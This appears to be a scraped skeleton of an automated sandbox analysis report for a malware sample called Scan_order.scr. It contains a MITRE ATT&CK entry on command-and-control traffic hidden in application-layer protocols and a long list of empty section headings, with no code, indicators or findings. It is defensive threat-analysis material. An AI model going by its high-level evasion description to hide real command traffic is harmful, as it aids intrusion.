Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Scan_order.scr

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Sigma Overview

System Summary:

Signature Overview

Compliance:

Networking:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTPS Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior